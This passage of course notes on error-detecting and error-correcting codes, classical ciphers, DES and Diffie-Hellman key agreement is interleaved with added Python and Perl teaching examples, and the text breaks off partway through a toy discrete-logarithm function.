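ROWS = ["01000001", "00110000", "01000100", "01000010", "01000010", "01000011"]


def parity(bits):
    """Even parity: 1 if the number of 1 bits is odd."""
    return sum(int(b) for b in bits) % 2


def column_check(rows):
    """One-way parity: one parity bit per column, the slide's Check row."""
    return "".join(str(parity(col)) for col in zip(*rows))


def row_parities(rows):
    """The extra column of two-way parity: one parity bit per row."""
    return [parity(r) for r in rows]


def check_block(rows, expected_rows, expected_cols):
    """Recompute both parities on the received rows and report which rows and
    columns disagree. One bad row plus one bad column locates a single flipped
    bit (which can then be corrected); anything else is only detection."""
    bad_rows = {i for i, r in enumerate(rows) if parity(r) != expected_rows[i]}
    bad_cols = {j for j, c in enumerate(column_check(rows)) if c != expected_cols[j]}
    return bad_rows, bad_cols


def flip(rows, positions):
    """Constructed channel errors: invert the bits at the given (row, col) positions."""
    grid = [list(r) for r in rows]
    for i, j in positions:
        grid[i][j] = "1" if grid[i][j] == "0" else "0"
    return ["".join(r) for r in grid]


if __name__ == "__main__":
    sent_rows, sent_cols = row_parities(ROWS), column_check(ROWS)
    print("row parities:", sent_rows, " check row:", sent_cols)
    print("one flip   ->", check_block(flip(ROWS, [(2, 5)]), sent_rows, sent_cols))
    print("two in row ->", check_block(flip(ROWS, [(3, 1), (3, 6)]), sent_rows, sent_cols))
    print("rectangle  ->", check_block(flip(ROWS, [(0, 2), (0, 3), (1, 2), (1, 3)]),
                                        sent_rows, sent_cols))
```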
Cyclic redundancy check codes
Treat the stream of transmitted bits as a representation of a polynomial with coefficients of 1:
10110 = x^4 + x^2 + x^1 = F(x)
Checksum bits are added to ensure that the final composite stream of bits is divisible by some other polynomial g(x).
Cyclic redundancy check codes
We can transform any stream F(x) into a stream T(x) which is divisible by g(x).
If there are errors in T(x), they take the form of a difference bit string E(x) and the final received bits are T(x) + E(x).
When the receiver gets a correct stream, it divides it by g(x) and gets no remainder.
Cyclic redundancy check codes
The question is: how likely is it that T(x) + E(x) will also divide with no remainder?
Single bits? - No: a single bit error means that E(x) will have only one term (x^1285 say). If the generator polynomial has the form x^n + ... + 1 it will never divide evenly.
Multiple bits? - Various generator polynomials are used with different properties. One factor of the polynomial must be x^1 + 1, because this ensures all odd numbers of bit errors (1, 3, 5, 7...) are detected.
Some common generators:
• CRC-12 - x^12 + x^11 + x^3 + x^2 + x^1 + 1
• CRC-16 - x^16 + x^15 + x^2 + 1
• CRC-32 - x^32 + x^26 + x^23 + x^22 + x^16 + x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + 1
• CRC-CCITT - x^16 + x^12 + x^5 + 1
Long division is easy!
Generator g(x): x^5 + x^2 + 1 (100101) and F(x): 101101011.
Divide F(x) by g(x) (modulo-2, i.e. XOR, long division), and the remainder is appended to F(x) to give T(x):

                   1 0 1 0 . 0 1 0 0 0
100101 ) 1 0 1 1 0 1 0 1 1 . 0 0 0 0 0
         1 0 0 1 0 1
         -----------
             1 0 0 0 0 1
             1 0 0 1 0 1
             -----------
                 1 0 0 1 0 0
                 1 0 0 1 0 1
                 -----------
                       1 0 0 0          (remainder 01000)

T(x) = 10110101101000.
Long division is easy!
When this stream is received, it is divided, but now will have no remainder if the stream is received without errors.
Diagram: the division implemented as a five-stage shift register D0 .. D4 (D flip-flops clocked with the data). The output of D4 is fed back through two XOR gates into the inputs of D0 and D2, corresponding to the terms of g(x) = x^5 + x^2 + 1; the register contents after the last data bit are the remainder.
Long division is easy!
Input data D4 D3 D2 D1 D0 Note
... 0 0 0 0 0 Initial state
1 0 0 0 0 1 First bit
0 0 0 0 1 0 Second bit
1 0 0 1 0 1 Third bit
1 0 1 0 1 1
0 1 0 1 1 0
1 0 1 0 0 0
0 1 0 0 0 0
1 0 0 1 0 0
...
Long division is easy!
Input data D4 D3 D2 D1 D0 Note
...
1 0 1 0 0 1
0 1 0 0 1 0
0 0 0 0 0 1
0 0 0 0 1 0
0 0 0 1 0 0
0 0 1 0 0 0
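The long division and the shift-register tables above, as an added Python example (not code from the slides). `register_states` is the D0 .. D4 circuit: it returns the register contents after each input bit and so reproduces the table rows for g(x) = 100101 and the stream 101101011.00000; `crc_encode` and `crc_check` are the sender's and receiver's halves. The CRC-16 generator used at the end is the one listed on the earlier slide, to show the "x + 1 factor catches every odd number of bit errors" claim.

```python
def register_states(bits, generator):
    """Feed `bits` (a string of 0/1) into a shift register whose XOR taps are the
    terms of `generator` (also a 0/1 string, highest power first). Returns the
    register contents after each bit; the last entry is the remainder."""
    deg = len(generator) - 1
    gen, mask = int(generator, 2), (1 << deg) - 1
    reg, states = 0, []
    for b in bits:
        reg = (reg << 1) | int(b)
        if reg >> deg:              # a 1 fell off the top: subtract (XOR) the generator
            reg ^= gen
        reg &= mask
        states.append(format(reg, f"0{deg}b"))
    return states


def crc_remainder(bits, generator):
    """Modulo-2 long division of bits by generator; the remainder has deg bits."""
    return register_states(bits, generator)[-1]


def crc_encode(data, generator):
    """Sender: T(x) = F(x) * x^deg + remainder, which g(x) then divides exactly."""
    deg = len(generator) - 1
    return data + crc_remainder(data + "0" * deg, generator)


def crc_check(received, generator):
    """Receiver: the stream is accepted only when the remainder is all zeros."""
    return crc_remainder(received, generator) == "0" * (len(generator) - 1)


def flip_bit(bits, index):
    """Constructed channel error E(x): invert one bit of the stream."""
    return bits[:index] + ("1" if bits[index] == "0" else "0") + bits[index + 1:]


G = "100101"                         # g(x) = x^5 + x^2 + 1 from the slide
CRC16 = "1" + "1" + "0" * 12 + "101"   # x^16 + x^15 + x^2 + 1 from the generator list

if __name__ == "__main__":
    for bit, state in zip("10110101100000", register_states("10110101100000", G)):
        print(bit, " ".join(state))
    t = crc_encode("101101011", G)
    print("T(x) =", t, "accepted:", crc_check(t, G), "after one flip:", crc_check(flip_bit(t, 3), G))
```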
Case study: ethernet
Ethernet is used for networking computers, principally because of its speed and low cost. The maximum size of an ethernet frame is 1514 bytes [6], and a 32-bit FCS is calculated over the full length of the frame.
The FCS used is:
• CRC-32 - x^32 + x^26 + x^23 + x^22 + x^16 + x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + 1
[6] 1500 bytes of data, a source and destination address each of six bytes, and a two byte type identifier. The frame also has a synchronizing header and trailer which is not checked by a CRC.
Simple error correction
Methods used to correct errors:
• Ignore errors, while acknowledging correct data: ARQ (Automatic Repeat reQuest).
• Error correcting codes (for computer memory)
Code types
We can divide error correcting codes (ECC) into continuous and block-based types. Convolutional encodings are used for continuous systems, and the common block-based codes are:
• Hamming codes (for correcting single bit errors),
• Golay codes (for correcting up to three bit errors), and
• Bose-Chaudhuri-Hocquenghem (BCH) codes (for correcting block errors).
Combining error correcting codes
Different types of error correcting codes can be combined to produce composite codes.
For example, Reed-Solomon block-codes are often combined with convolutional codes to improve all-round performance.
In this combined setup, the convolutional code corrects randomly distributed bit errors but not bursts of errors, while the Reed-Solomon code corrects the burst errors.
Accepting bad data
Sometimes we are willing to accept bad data...
BER and noise
System Error rate (errors/bit)
Wiring of internal circuits 10^-15
Memory chips 10^-14
Hard disk 10^-9
Optical drives 10^-8
Coaxial cable 10^-6
Optical disk (CD) 10^-5
Telephone System 10^-4
BER and noise
We can determine the theoretical channel capacity knowing the SNR:
• BER is 0.01, channel capacity C ≈ 0.92 bits/symbol.
• BER is 0.001, channel capacity C ≈ 0.99 bits/symbol.
• BER is 0, channel capacity C = 1 bits/symbol.
The theoretical maximum channel capacity is quite close to the perfect channel capacity, even if the BER is high.
Reducing BER
Increase the signal (power), or
Reduce the noise (often not possible), or
Use ECC.
The benefit of error correcting codes is that they can improve the received BER without increasing the transmitted power. This performance improvement is measured as a system gain.
Reducing BER
Example: Consider a system without ECC giving a BER of 0.001 with a S/N ratio of 30dB (1000:1). If we were to use an ECC codec, we might get the same BER of 0.001 with a S/N ratio of 20dB (100:1). We say that the system gain due to ECC is 10dB (10:1).
Bad ECC scheme: repetition
An initial scheme to correct transmission errors might be to just repeat bits [7].
Data:     0 1 0 0 1 1 1 1 ...
Transmit: 000111000000111111111111...
If we send three identical bits for every bit we wish to transmit, we can then use a voting system to determine the most likely bit. If our natural BER due to noise was 0.01, with three bits we would achieve a synthetic BER of 0.0001, but our channel capacity is reduced to about C = 0.31 bits/symbol.
[7] Note: there is no point in repeating bits twice. You must repeat three times, or 5 times, and then vote to decide the best value.
Bad ECC scheme: repetition
We can see from this that the rate of transmission using repetition has to approach zero to achieve more and more reliable transmission.
However, we know that the theoretical rate should be equal to or just below the channel capacity C.
Convolutional and other encodings can achieve rates of transmission close to the theoretical maximum.
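The channel-capacity figures, the system gain and the repetition scheme of the last few slides, worked in Python as an added example (not code from the slides). `bsc_capacity` is C = 1 − H(BER) for a binary symmetric channel, which gives the 0.92 and 0.99 bits/symbol quoted above; `repetition_error_rate` is the exact majority-vote error probability for n-fold repetition from the binomial formula (for BER 0.01 and three copies it comes to about 3 × 10^-4, the same order as the slide's rough 10^-4); `repetition_rate` shows how the useful rate collapses as n grows. The S/N figures (30dB with no ECC, 20dB with ECC) are the slide's.

```python
import math
from math import comb


def binary_entropy(p):
    """H(p) in bits; 0 at the endpoints."""
    if p <= 0.0 or p >= 1.0:
        return 0.0
    return -p * math.log2(p) - (1 - p) * math.log2(1 - p)


def bsc_capacity(ber):
    """Capacity of a binary symmetric channel, 1 - H(BER) bits/symbol."""
    return 1.0 - binary_entropy(ber)


def repetition_error_rate(ber, n):
    """Probability that a majority vote over n (odd) copies of a bit is wrong:
    more than half of the copies must have been corrupted."""
    if n % 2 == 0:
        raise ValueError("repeat an odd number of times so the vote cannot tie")
    needed = n // 2 + 1
    return sum(comb(n, j) * ber ** j * (1 - ber) ** (n - j) for j in range(needed, n + 1))


def repetition_rate(ber, n):
    """Useful bits per transmitted symbol after n-fold repetition: the capacity
    of the improved channel divided by the n symbols spent on every data bit."""
    return bsc_capacity(repetition_error_rate(ber, n)) / n


def system_gain_db(snr_db_without_ecc, snr_db_with_ecc):
    """System gain: the S/N reduction the code tolerates at the same BER."""
    return snr_db_without_ecc - snr_db_with_ecc


if __name__ == "__main__":
    for ber in (0.01, 0.001, 0.0):
        print(f"BER {ber}: C = {bsc_capacity(ber):.3f} bits/symbol")
    for n in (3, 5, 7):
        print(f"repeat x{n}: BER {repetition_error_rate(0.01, n):.2e}, rate {repetition_rate(0.01, n):.3f}")
    print("system gain:", system_gain_db(30, 20), "dB")
```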
ECC scheme: Hamming
Hamming codes are block-based error correcting codes.
We add hamming bits to a string
Here we derive the inequality used to determine how many extra hamming bits are needed for an arbitrary bit string.
ECC scheme: Hamming
The hamming distance is a measure of how FAR apart two bit strings are.
A:       0 1 0 1 1 1 0 0 0 1 1 1
B:       0 1 1 1 1 1 1 0 0 1 0 1
A XOR B: 0 0 1 0 0 0 1 0 0 0 1 0
ECC scheme: Hamming
If we had two bit strings X and Y representing two characters, and the hamming distance between any two codes was d, we could turn X into Y with d single bit errors.
• If we had an encoding scheme (for say ASCII characters) and the minimum hamming distance between any two codes was d + 1, we could detect d single bit errors [8].
• We can correct up to d single bit errors in an encoding scheme if the minimum hamming distance is 2d + 1.
[8] Because the code d bits away from a correct code is not in the encoding.
ECC scheme: Hamming
If we now encode m bits using r extra hamming bits to make a total of n = m + r, we can count how many correct and incorrect hamming encodings we should have. With m bits we have 2^m unique messages - each with n illegal encodings, and:
(n + 1) 2^m ≤ 2^n
(m + r + 1) 2^m ≤ 2^n
m + r + 1 ≤ 2^(n − m)
m + r + 1 ≤ 2^r
ECC scheme: Hamming
We solve this inequality, and then choose R, the next integer larger than r.
Example: If we wanted to encode 8 bit values (m = 8) and be able to recognise single bit errors:
8 + r + 1 ≤ 2^r
9 ≤ 2^r − r
r ≈ 3.5
R = 4
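The inequality, the hamming distance and a single-error-correcting Hamming code, as an added Python example (not code from the slides). `hamming_bits_needed` solves m + r + 1 ≤ 2^r by search (giving R = 4 for m = 8, as above); `hamming_encode` places the R check bits at the power-of-two positions of the n = m + R bit codeword, and `hamming_decode` uses the syndrome to find and correct one flipped bit. The data bytes used are constructed; the strings A and B are the ones on the hamming-distance slide.

```python
def hamming_bits_needed(m):
    """Smallest r satisfying the slide's inequality m + r + 1 <= 2**r."""
    r = 1
    while m + r + 1 > 2 ** r:
        r += 1
    return r


def hamming_distance(a, b):
    """Number of positions in which two equal-length bit sequences differ."""
    return sum(x != y for x, y in zip(a, b))


def hamming_encode(data):
    """Put the data bits at the non-power-of-two positions 1..n and make each
    check bit 2**p the even parity of every position whose index has bit p set."""
    m = len(data)
    r = hamming_bits_needed(m)
    n = m + r
    code = [0] * (n + 1)             # 1-indexed; code[0] is unused
    data_iter = iter(data)
    for pos in range(1, n + 1):
        if pos & (pos - 1):           # not a power of two: a data position
            code[pos] = next(data_iter)
    for p in range(r):
        check = 1 << p
        code[check] = sum(code[pos] for pos in range(1, n + 1)
                          if pos & check and pos != check) % 2
    return code[1:]


def hamming_decode(codeword):
    """Syndrome = XOR of the indices of all 1 bits. It is 0 for a valid codeword
    and otherwise names the position of a single flipped bit (the code's minimum
    distance is 3 = 2d + 1 with d = 1, so only one error can be corrected).
    Returns (data bits, syndrome)."""
    code = [0] + list(codeword)
    n = len(codeword)
    syndrome = 0
    for pos in range(1, n + 1):
        if code[pos]:
            syndrome ^= pos
    if 0 < syndrome <= n:
        code[syndrome] ^= 1
    data = [code[pos] for pos in range(1, n + 1) if pos & (pos - 1)]
    return data, syndrome


A = [0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1]   # from the slide
B = [0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1]   # from the slide

if __name__ == "__main__":
    print("distance(A, B) =", hamming_distance(A, B))
    byte = [1, 0, 1, 1, 0, 0, 1, 0]            # constructed 8-bit value
    cw = hamming_encode(byte)
    damaged = cw[:]
    damaged[5] ^= 1
    print("codeword:", cw, "decoded after a flip:", hamming_decode(damaged))
```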
Reed-Solomon codes
Reed-Solomon codes are block-based error correcting codes which are particularly good at correcting bursts (sequences) of bit errors.
They are found in a wide range of digital communications and storage applications.
Reed-Solomon codes are used to correct errors in digital wireless applications such as wireless LAN systems, and low Earth orbit (LEO) satellite communication systems.
Reed-Solomon codes
A Reed-Solomon code is specified as
• RS(n,k) with s-bit symbols.
This means that the encoder takes k data symbols of s bits each and adds parity symbols to make an n symbol codeword. There are n − k parity symbols of s bits each. A Reed-Solomon decoder can correct up to t symbols that contain errors in a codeword, where
2t = n − k
Reed-Solomon code
Example: A popular Reed-Solomon code is RS(255,223) with 8-bit symbols. Each codeword contains 255 code word bytes, of which 223 bytes are data and 32 bytes are parity. In this example, n = 255, k = 223, and s = 8.
2t = 32
and so t = 16
The Reed-Solomon decoder in this example can correct any 16 symbol errors in the codeword.
Chapter 7
Lecture 7 - Encryption
Last session
• Information flow
• Simple error detection
• Simple error correction
This session
• Finish on error correction
• Encryption
– Symmetric keys
∗ DES
– Public keys
∗ RSA
Key points from last week
Error detection vs Error correction
Mathematical analysis
Error rate, noise, channel capacity
Theoretical vs actual channel capacity
Convolutional codes
Convolutional codes operate continuously and so are especially useful in data transmission systems.
The convolutional encoder operates on a continuous stream of data using a shift-register to produce a continuous encoded output stream.
Convolutional codes
Diagram: convolutional encoder. Data In is clocked through a chain of D flip-flops (a shift register), and XOR gates combining taps of the register produce Data Out.
The received bit sequence can be examined for the most likely correct output sequence.
Trellis diagram
Diagram: trellis of the encoder’s four states A, B, C and D, drawn over time, with every transition labelled by the two output bits (00, 01, 10 or 11) it produces.
Most likely path
If we were to input the sequence 011010, we would get the following trace through the trellis, with the bit sequence output as 001110110101:
Diagram: the path through the states A, B, C, D for this input, with branch outputs 00 11 10 11 01 01.
Convolutional codes
Determine the most likely path, even with large numbers of bit errors.
A convolutional encoding can often reduce errors by a factor of 10^2 to 10^3.
Viterbi decoding
The Viterbi algorithm tries to find the most likely received data sequence, by keeping track of the four most likely paths through the trellis.
For each path, a running count of the hamming distance between the received sequence and the path is maintained.
The most likely received string is the one with the lowest hamming distance.
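The encoder, trellis and Viterbi decoder of the last few slides, as an added Python example (not code from the slides). The slides do not state the encoder's taps; the taps `TAPS` below are an assumption chosen so that the encoder reproduces the slide's trace (input 011010 gives output 001110110101), with the four trellis states being the last two input bits. `viterbi_decode` keeps the best-metric path into each of the four states, as the slide describes, and traces back from the best final state; the corrupted sequence in the usage is constructed.

```python
from itertools import product

# Generator taps over the register (u, s1, s2): current input, previous, and the
# one before. Assumption: chosen to reproduce the slide's 011010 -> 001110110101.
TAPS = ((1, 0, 1), (1, 1, 0))
STATES = list(product((0, 1), repeat=2))       # the trellis's four states A..D


def branch(u, state):
    """Output pair and next state when input bit u arrives in `state`."""
    regs = (u,) + state
    outputs = tuple(sum(t & r for t, r in zip(taps, regs)) & 1 for taps in TAPS)
    return outputs, (u, state[0])


def conv_encode(bits):
    """Rate-1/2 encoder: two output bits per input bit, starting from state 00."""
    state, out = (0, 0), []
    for u in bits:
        outputs, state = branch(u, state)
        out.extend(outputs)
    return out


def hamming_distance(a, b):
    return sum(x != y for x, y in zip(a, b))


def viterbi_decode(received):
    """Keep, for each state, the lowest running Hamming distance path that
    reaches it (four survivors), then trace back from the best final state."""
    metric = {s: float("inf") for s in STATES}
    metric[(0, 0)] = 0
    history = []                                    # per step: state -> (previous state, input)
    for i in range(0, len(received) - 1, 2):
        pair = received[i:i + 2]
        new_metric = {s: float("inf") for s in STATES}
        back = {}
        for s in STATES:
            if metric[s] == float("inf"):
                continue
            for u in (0, 1):
                outputs, nxt = branch(u, s)
                m = metric[s] + hamming_distance(outputs, pair)
                if m < new_metric[nxt]:
                    new_metric[nxt], back[nxt] = m, (s, u)
        metric = new_metric
        history.append(back)
    state = min(STATES, key=lambda s: metric[s])
    decoded = []
    for back in reversed(history):
        state, u = back[state]
        decoded.append(u)
    return decoded[::-1]


if __name__ == "__main__":
    message = [0, 1, 1, 0, 1, 0]                    # the slide's input sequence
    sent = conv_encode(message)
    received = sent[:]
    received[3] ^= 1                                # constructed single channel error
    print("sent    ", "".join(map(str, sent)))
    print("received", "".join(map(str, received)))
    print("decoded ", viterbi_decode(received))
```

With these taps a single flipped bit anywhere except the final output pair is always corrected: every other path through the trellis is at least three bits away from the transmitted one, so the true path keeps the lowest running distance.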
Encryption and authentication
Security and cryptographic systems act to reduce failure of systems due to the following threats:
Interruption - attacking the availability of a service (Denial of Service).
Interception - attacks confidentiality.
Modification - attacks integrity.
Fabrication - attacks authenticity. Note that you may not need to decode a signal to fabricate it - you might just record and replay it.
Encoding and deciphering
I could have told her the truth - that the same calculation which had served me for deciphering the manuscript had enabled me to learn the word - but on a caprice it struck me to tell her that a genie had revealed it to me. This false disclosure fettered Madame d’Urfé to me. That day I became the master of her soul, and I abused my power.
We call these systems symmetric key systems...
Symmetric key systems
Diagram: plaintext P is enciphered under the shared key Ki to give Ki[P], and deciphered with the same key Ki back to the plaintext P.
Simple ciphers - transposition
Transposition ciphers just re-order the letters of the original message. This is known as an anagram:
• parliament is an anagram of partial men
• Eleven plus two is an anagram of Twelve plus one
Perhaps you would like to see if you can unscramble “age prison”, or “try open”.
Transposition
Detect a transposition cipher with the frequencies of the letters, and letter pairs.
If the frequency of single letters in ciphertext is correct, but the frequencies of letter pairs is wrong, then the cipher may be a transposition.
This sort of analysis can also assist in unscrambling a transposition ciphertext, by arranging the letters in their letter pairs.
Simple ciphers - substitution
Substitution cipher systems encode the input stream using a substitution rule.
The Cæsar cipher is an example of a simple substitution cipher system, but it can be cracked in at most 25 attempts by just trying each of the 25 values in the keyspace.
Substitution
Code Encoding
A Q
B V
C X
D W
... ...
If the mapping was more randomly chosen it is called a monoalphabetic substitution cipher, and the keyspace for encoding 26 letters would be 26! − 1 = 403,291,461,126,605,635,583,999,999.
Substitution
If we could decrypt 1,000,000 messages in a second, then the average time to find a solution would be about 6,394,144,170,576 years!
We might be lulled into a sense of security by these big numbers, but of course this sort of cipher can be subject to frequency analysis.
Frequency analysis
In the English language, the most common letters are: "E T A O N I S H R D L U..." (from most to least common), and we may use the frequency of the encrypted data to make good guesses at the original plaintext.
We may also look for digrams and trigrams (th, the).
Vigenère
The Vigenère cipher is a polyalphabetic substitution cipher invented around 1520.
We use an encoding/decoding sheet, called a tableau, and a keyword or key sequence.
Vigenère
A B C D E F G H ...
A A B C D E F G H ...
B B C D E F G H I ...
C C D E F G H I J ...
D D E F G H I J K ...
E E F G H I J K L ...
F F G H I J K L M ...
G G H I J K L M N ...
H H I J K L M N O ...
... ... ... ... ... ... ... ... ... ...
Vigenère
If our keyword was BAD, then encoding HAD A FEED would result in
Key    B A D B A D B A
Text   H A D A F E E D
Cipher I A G B F H F D
If we can discover the length of the repeated key (in this case 3), and the text is long enough, we can just consider the cipher text to be a group of interleaved monoalphabetic substitution ciphers and solve accordingly.
Analysis
The index of coincidence is the probability that two randomly chosen letters from the cipher will be the same, and it can help us discover the length of a key:

$$IC = \frac{1}{N(N-1)} \sum_{i=0}^{25} F_i (F_i - 1)$$

where F_i is the frequency of the occurrences of symbol i and N is the length of the cipher.
Index of coincidence
#!/usr/bin/perl
# Coincidences between the text and itself rotated by $skip places
$skip = $ARGV[0];
@text = <STDIN>;
$all = join('', @text);
$all =~ tr/a-z/A-Z/;                      # fold to upper case
$all =~ tr/A-Z//cd;                       # drop everything that is not a letter
$header = substr($all, 0, $skip);
$shifted = substr($all, $skip) . $header; # rotate the text by $skip
@alltxt = split(//, $all);
@shiftxt = split(//, $shifted);
$count = 0;
foreach $i (0 .. $#alltxt) {
    if ($alltxt[$i] eq $shiftxt[$i]) { $count++; }
}
printf("Index of Coincidence is: %.3f\n", $count / scalar(@alltxt));
Show analysis using shifts of 1...2...3...
Index of coincidence
The ideas here were developed by William F. Friedman in his Ph.D.
Friedman also coined the words “cryptanalysis” and “cryptology”.
Friedman worked on the solution of German code systems during the first (1914-1918) world war, and later became a world-renowned cryptologist.
S-box
Diagram: an S-box built from a decoder, the permutation (3,4,2,1) of its outputs, and an encoder (the two converters are labelled 4:2 and 2:4).
S-boxes and P-boxes
The S-box (Substitution-Box) is a hardware device which encodes n bit numbers to other n bit numbers and can be represented by a permutation.
A P-box is just a simple permutation box.
If you use an S-box and a P-box at once, you have a product cipher which is generally harder to decode.
DES - Data Encryption Standard
DES was first proposed by IBM using 128 bit keys, but its security was reduced by NSA (the National Security Agency) to a 56 bit key.
At 1ms/guess, it would take 10^80 years to solve 128 bit key encryption.
The DES Standard gave a business level of safety, and is a product cipher.
DES - Data Encryption Standard
The (shared) 56 bit key is used to generate 16 subkeys, which each control a sequenced P-box or S-box stage.
DES works on 64 bit messages called blocks.
If you intercept the key, you can decode the message.
However, there are about 10^17 keys.
Feistel
Diagram: a three-round Feistel network. Encryption takes the halves (l0, r0) through (l1, r1) and (l2, r2) to (l3, r3), each round XORing one half with f of the other half and the round key, using the keys K0, K1, K2 in turn; decryption runs the same rounds with the keys in the reverse order K2, K1, K0 and recovers (l0, r0).
Each of the 16 stages (rounds) of DES uses a Feistel structure which encrypts a 64 bit value into another 64 bit value using a 48 bit key derived from the original 56 bit key.
DES modes of operation
The US government specifically recommends not using the weakest, simplest mode for messages, the Electronic Codebook (ECB) mode.
They recommend the stronger and more complex Cipher Feedback (CFB) or Cipher Block Chaining (CBC) modes.
The CBC mode XORs the next 64-bit block with the result of the previous 64-bit encryption, and is more difficult to attack.
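A toy Feistel block cipher and the ECB and CBC modes of the last two slides, as an added Python example that is not code from the slides and is not DES: the round function, the key schedule and the 64-bit key and IV values are constructed stand-ins (DES's S-boxes, P-box and 48-bit subkeys are not reproduced). What it does show faithfully is the Feistel property that decryption is the same network with the subkeys reversed, and why ECB is the weakest mode: equal plaintext blocks give equal ciphertext blocks, which chaining hides.

```python
MASK32 = 0xFFFFFFFF


def round_function(right, subkey):
    """Toy round function f(R, K). Assumption: any function works here, because
    a Feistel network never needs to invert f; DES uses its S-boxes and P-box."""
    x = (right ^ subkey) & MASK32
    x = (x * 0x9E3779B1 + 0x7F4A7C15) & MASK32
    return ((x << 13) | (x >> 19)) & MASK32


def key_schedule(key56, rounds=16):
    """Toy schedule: one 32-bit subkey per round from a 56-bit key (assumption;
    DES derives 48-bit subkeys by permuted rotations of the key halves)."""
    return [((key56 >> (3 * i)) ^ (key56 * (2 * i + 1))) & MASK32 for i in range(rounds)]


def feistel_encrypt_block(block, subkeys):
    """(L, R) -> (R, L xor f(R, K)) per round, then the halves are swapped."""
    left, right = block >> 32, block & MASK32
    for k in subkeys:
        left, right = right, left ^ round_function(right, k)
    return (right << 32) | left


def feistel_decrypt_block(block, subkeys):
    """The same network with the subkeys in reverse order, as in the diagram."""
    return feistel_encrypt_block(block, subkeys[::-1])


def blocks_of(data):
    """Split bytes into 64-bit blocks (toy: the caller pads to a multiple of 8)."""
    if len(data) % 8:
        raise ValueError("data must be a multiple of 8 bytes")
    return [int.from_bytes(data[i:i + 8], "big") for i in range(0, len(data), 8)]


def ecb_encrypt(data, subkeys):
    """Electronic Codebook: every block is enciphered on its own."""
    return [feistel_encrypt_block(b, subkeys) for b in blocks_of(data)]


def cbc_encrypt(data, subkeys, iv):
    """Cipher Block Chaining: XOR the previous ciphertext block (the IV first)
    into each plaintext block before enciphering it."""
    out, prev = [], iv
    for b in blocks_of(data):
        prev = feistel_encrypt_block(b ^ prev, subkeys)
        out.append(prev)
    return out


def cbc_decrypt(cipher_blocks, subkeys, iv):
    out, prev = [], iv
    for c in cipher_blocks:
        out.append(feistel_decrypt_block(c, subkeys) ^ prev)
        prev = c
    return out


KEYS = key_schedule(0x0123456789ABCD)        # constructed 56-bit key
IV = 0x0F1E2D3C4B5A6978                      # constructed initial vector
MESSAGE = b"PAY 100 TO ALICE" * 2            # constructed: blocks 0 and 2 are identical

if __name__ == "__main__":
    print("ECB:", [hex(c) for c in ecb_encrypt(MESSAGE, KEYS)])
    print("CBC:", [hex(c) for c in cbc_encrypt(MESSAGE, KEYS, IV)])
```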
DES modes of operation
Diagram: Electronic Code Book - each msg block is passed through DES on its own to give its Ctext block. Cipher Block Chaining - an initial vector is XORed into the first msg block, and each subsequent msg block is XORed with the previous Ctext block before going through DES.
DES software
DES is available as a library on both UNIX and Microsoft-based systems. There is typically a des.h file, which must be included in any C source using the DES library:
#include "des.h"
//
// - Your calls
DES software
After initialization of the DES engine, the library provides a system call which can both encrypt and decrypt:
int des_cbc_encrypt(clear, cipher, schedule, encrypt)
where the encrypt parameter determines if we are to encipher or decipher.
The schedule contains the secret DES key.
Case study: Amoeba capabilities
All Amoeba objects are identified by a capability string which is encrypted using DES encryption. A capability is long enough so that you can’t just make them up.
If you have the string, you have whatever the capability allows you. If you want to give someone some access to a file, you can give them the capability string. They place this in their directory, and can see the file.
Case study: Amoeba capabilities
Field        Size     Meaning
Server Port  48 bits  Identifies the server which manages the object
Object ID    24 bits  Internal number which the server uses to identify the object
Rights        8 bits  Identifies which operations are allowed
Check field  48 bits  Protects against forging
To further prevent tampering, the capability is DES encrypted. The resultant bit stream may be used directly, or converted to and from an ASCII string with the a2c and c2a commands.
Public key systems
In 1976 Diffie and Hellman published the paper “New Directions in Cryptography”, which first introduced the idea of public key cryptography.
Public key cryptography relies on the use of enciphering functions which are not realistically invertible unless you have a deciphering key.
For example, we have the discrete logarithm problem in which it is relatively easy to calculate n = g^k mod p given g, k and p, but difficult to calculate k in the same equation, given g, n and p.
Diffie-Hellman key agreement
Two separated users create and share a secret key. A third party is not realistically able to calculate the shared key.
Diagram: Alice (knowing p, g and a) sends g^a mod p to Bob; Bob (knowing p, g and b) sends g^b mod p to Alice. Ted, listening in between them, sees only p, g, g^a mod p and g^b mod p.
Knowledge different
• All participants know two system parameters $p$ and $g$
• Alice and Bob each have a secret value (Alice has $a$ and Bob has $b$)
• Alice and Bob each calculate and exchange a public key ($g^a \bmod p$ for Alice and $g^b \bmod p$ for Bob).
• Ted knows $g$, $p$, $g^a \bmod p$ and $g^b \bmod p$, but not $a$ or $b$.
Diffie-Hellman key agreement
Both Alice and Bob can now calculate the value $g^{ab} \bmod p$.
1. Alice calculates $(g^b \bmod p)^a \bmod p = (g^b)^a \bmod p$.
2. Bob calculates $(g^a \bmod p)^b \bmod p = (g^a)^b \bmod p$.
And of course $(g^b)^a \bmod p = (g^a)^b \bmod p = g^{ab} \bmod p$, which is the shared key.
Diffie-Hellman key agreement
Ted has a much more difficult problem. It is difficult to calculate $g^{ab} \bmod p$ without knowing either $a$ or $b$. The algorithmic run-time of the (so-far best) algorithm for doing this is in
$O(e^{c\sqrt{r \log r}})$
where $c$ is small, but $\geq 1$, and $r$ is the number of bits in the number.
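As an added worked example (not from the notes), the exchange of the last three slides with textbook-sized parameters $p = 23$, $g = 5$, $a = 6$, $b = 15$, followed by Ted's only option at this size: recovering $a$ by brute-force discrete logarithm. The work_estimate function is my reading of the table on the next slide, whose rows are reproduced by the run-time formula with $c = 1$ and a base-10 logarithm.

```python
import math


def dh_public(g: int, secret: int, p: int) -> int:
    """Public value g^secret mod p, sent over the insecure channel."""
    return pow(g, secret, p)


def dh_shared(peer_public: int, secret: int, p: int) -> int:
    """(g^b mod p)^a mod p == (g^a mod p)^b mod p == g^{ab} mod p."""
    return pow(peer_public, secret, p)


def run_exchange(p: int, g: int, a: int, b: int):
    """Alice holds a, Bob holds b; returns (g^a mod p, g^b mod p, shared key)."""
    alice_pub = dh_public(g, a, p)
    bob_pub = dh_public(g, b, p)
    key_alice = dh_shared(bob_pub, a, p)
    key_bob = dh_shared(alice_pub, b, p)
    assert key_alice == key_bob, "both sides must agree on g^{ab} mod p"
    return alice_pub, bob_pub, key_alice


def ted_discrete_log(g: int, target: int, p: int) -> int:
    """Ted sees g, p and g^a mod p only. With a tiny p he can try every exponent;
    this loop is O(p), i.e. exponential in the bit size r, which is why real p
    has thousands of bits."""
    value = 1
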